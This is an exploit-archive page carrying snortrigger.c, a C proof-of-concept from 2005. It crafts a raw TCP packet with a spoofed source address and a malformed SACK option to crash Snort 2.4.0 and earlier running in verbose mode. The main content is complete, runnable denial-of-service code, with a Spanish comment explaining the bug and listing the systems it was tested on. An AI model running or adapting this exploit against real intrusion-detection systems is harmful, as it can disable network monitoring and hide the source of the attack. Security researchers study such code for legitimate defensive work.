exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

snortrigger.c

snortrigger.c
Posted Sep 13, 2005
Authored by nitrous

Snort versions 2.4.0 and below remote proof of concept exploit that creates a malformed TCP/IP packet that will trigger a vulnerability in the PrintTcpOptions() function from log.c.

tags | exploit, remote, tcp, proof of concept
SHA-256 | 5cb6f490e8d8bdbbc7c4c7316ff20da370bf31d280b268795c2bb556ca899b9a

snortrigger.c

Change Mirror Download
/*_------------------------------------------_
||------+ Snort <= 2.4.0 Trigger p0c +------||
||__________________________________________||
||--=[ nitrous [at] vulnfact [dot] com ]=--||
||--=[ VulnFact Security Labs ]=--||
||--=[ 21 Ago 2oo5 ]=--||
||--=[ Mexico ]=--||
||__________________________________________||
-__________________________________________-

Snort <= 2.4.0 SACK TCP Option Error Handling
Este código envia al <target> especificado un paquete TCP/IP con 4 bytes extras
correspondientes al campo TCP Options [TCP Header].
Estos 4 bytes son "\x05\x02\x00\x00". NOTA !!!: Snort solamente cae cuando se
esta corriendo en verbose mode (-v).

Esto solo funciona testeando de una maquina a otra directamente conectadas
(1 solo salto; Ej. En una red LAN de PC a PC). No funciona desde Internet, por
que el campo TCP->th_sum es 0 (cero), por lo tanto, el primer Router por donde
pase este paquete lo descartara por no tener una checksum valida.

RFC #1072 - TCP Extensions for Long-Delay Paths

3.2- TCP SACK Option:
...
Kind: 5
Length: Variable
+--------+--------+--------+--------+--------+--------+
| Kind=5 | Length | Relative Origin | Block Size |
+--------+--------+--------+--------+--------+--------+

Analizando el packete con 'tcpdump' en OpenBSD 3.5 vemos:
11:17:53.093264 ip: 127.0.0.1.29383 > 127.0.0.1.80: S 213975407:213975407(0) win 5840
<malformed sack [len 0] ,eol>
0000: 4500 002c bc4f 0000 ff06 017a 7f00 0001 E..,ŒO..ÿ..z....
0010: 7f00 0001 72c7 0050 0cc1 016f 43f1 8422 ....rÇ.P.Á.oCñ."
0020: 6002 16d0 3caf 0000 0502 0000 `..Ð<¯......

Testeado en:
[+] snort 2.4.0 @ OpenBSD 3.7 GENERIC // Yeah ;)
[+] snort 2.4.0 @ Ubuntu Linux 5.04 "Hoary Hedgehog"
[+] snort 2.3.2 @ Debian Linux 3.1 "Sarge"
[+] snort 2.3.0 @ Ubuntu Linux 5.04 "Hoary Hedgehog"
[+] snort 2.3.0 @ Red Hat Linux 9
[+] snort 2.2.0 @ Ubuntu Linux 5.04 "Hoary Hedgehog"
[+] snort 2.0.0 @ OpenBSD 3.5 GENERIC

Saludos a vulnfact.com, CRAc, stacked, ran, dex, benn, beck, zlotan, Rowter, Gus, Crypkey,
protoloco, Falckon, dymitri, #cum ppl, warlord/nologin.org por fuzzball2 fuzzer, gcarrillog,
JSS, y en especial a Mariit@ ( Sexy Colombiana ;) ). A la musica de "Sussie 4" ;)...
Federico L. Bossi Bonin
*/

#include<stdio.h>
#include<string.h>
#include<unistd.h>
#include<errno.h>
#include<netdb.h>
#include<sys/types.h>
#include<sys/socket.h>
#include<netinet/in.h>
//#define __USE_BSD 1 /* Use BSD's ip header style */
#include<netinet/ip.h>
#define __FAVOR_BSD 1 /* Use BSD's tcp header style */
#include<netinet/tcp.h>

#define IPSIZE sizeof(struct ip)
#define TCPSIZE sizeof(struct tcphdr)
#define DEFAULT_SRC_IP "200.31.33.70"

char trigger[] = "\x05\x02\x00\x00"; /* Malformed SACK TCP Option */

int usage(char *name)
{
fprintf(stderr, "Usage: %s <target> [spoofed srcip]\n", name);
fprintf(stderr, "\t\tDefault srcip = %s\n", DEFAULT_SRC_IP);

return 0;
}

int main(int argc, char **argv)
{
char *packet= (char *) malloc(IPSIZE + TCPSIZE + 4);
char *srcip = DEFAULT_SRC_IP;
int sockfd, count;
int one = 1; /* setsockopt() */
struct sockaddr_in target;
struct hostent *host2ip;
struct ip *IP = (struct ip *) packet;
struct tcphdr *TCP = (struct tcphdr *) (packet + IPSIZE);

if(argc < 2)
return(usage(*argv));

if(argc == 3)
srcip = argv[2];

if((host2ip = gethostbyname(argv[1])) == NULL){
perror("gethostbyname");
exit(-1);
}

if(getuid() != 0){
fprintf(stderr, "Ups!, must be r00t to perform RAW sockets\n");
exit(-1);
}

memset(packet, 0x00, sizeof(packet));

memset(&target, 0x00, sizeof(target));
target.sin_family = AF_INET;
target.sin_port = htons(64876);
target.sin_addr = *((struct in_addr *)host2ip->h_addr);

/*** BUILDING MALFORMED PACKET ***/
IP->ip_hl = 0x05;
IP->ip_v = 0x04;
IP->ip_tos = 0x00;
IP->ip_len = IPSIZE + TCPSIZE + 4;
IP->ip_id = 0x00;
IP->ip_off = 0x00;
IP->ip_ttl = 0xff;
IP->ip_p = IPPROTO_TCP;
IP->ip_sum = 0x00;
IP->ip_src.s_addr = inet_addr(srcip);
IP->ip_dst.s_addr = target.sin_addr.s_addr;

TCP->th_sport = htons(31337);
TCP->th_dport = target.sin_port;
TCP->th_seq = 0x00;
TCP->th_ack = 0x00;
TCP->th_x2 = 0x00;
TCP->th_off = 0x06;
TCP->th_flags = 0x00; /* NO Syn ;) */
TCP->th_win = htons(0xffff);
TCP->th_sum = 0x00;
TCP->th_urp = 0x00;

memcpy(packet + IPSIZE + TCPSIZE, trigger, 4);
/*** END ***/

if((sockfd = socket(PF_INET, SOCK_RAW, IPPROTO_TCP)) == -1){
perror("socket");
exit(-1);
}

if(setsockopt(sockfd, IPPROTO_IP, IP_HDRINCL, &one, sizeof(one)) == -1){
perror("setsockopt");
exit(-1);
}

printf("-=[ Snort <= 2.4.0 Trigger p0c\n");
printf("-=[ By nitr0us <nitrous[at]vulnfact[dot]com>\n\n");
printf("-=[ Sending Malformed TCP/IP Packet...\n");

if((count = sendto(sockfd, packet, IP->ip_len, 0, (struct sockaddr *)&target, sizeof(target))) == -1){
perror("sendto");
close(sockfd);
exit(-1);
}

printf("-=[ Sent %d bytes to %s\n", count, argv[1]);
printf("-=[ Snort killed ! (May be)\n");

close(sockfd);
return 0;
}
Login or Register to add favorites

File Archive:

February 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    16 Files
  • 2
    Feb 2nd
    19 Files
  • 3
    Feb 3rd
    0 Files
  • 4
    Feb 4th
    0 Files
  • 5
    Feb 5th
    24 Files
  • 6
    Feb 6th
    2 Files
  • 7
    Feb 7th
    10 Files
  • 8
    Feb 8th
    25 Files
  • 9
    Feb 9th
    37 Files
  • 10
    Feb 10th
    0 Files
  • 11
    Feb 11th
    0 Files
  • 12
    Feb 12th
    17 Files
  • 13
    Feb 13th
    20 Files
  • 14
    Feb 14th
    25 Files
  • 15
    Feb 15th
    15 Files
  • 16
    Feb 16th
    6 Files
  • 17
    Feb 17th
    0 Files
  • 18
    Feb 18th
    0 Files
  • 19
    Feb 19th
    35 Files
  • 20
    Feb 20th
    25 Files
  • 21
    Feb 21st
    18 Files
  • 22
    Feb 22nd
    15 Files
  • 23
    Feb 23rd
    0 Files
  • 24
    Feb 24th
    10 Files
  • 25
    Feb 25th
    0 Files
  • 26
    Feb 26th
    37 Files
  • 27
    Feb 27th
    34 Files
  • 28
    Feb 28th
    27 Files
  • 29
    Feb 29th
    8 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close